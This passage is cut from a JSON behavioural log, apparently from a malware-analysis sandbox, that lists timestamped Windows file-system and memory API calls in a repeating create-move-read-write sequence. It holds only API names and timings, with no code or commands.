"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,340", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:47,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,410", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:47,500", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,500", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,520", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,520", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,530", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,530", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,541", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,541", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,551", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,551", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,561", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,571", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,571", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:47,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:47,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 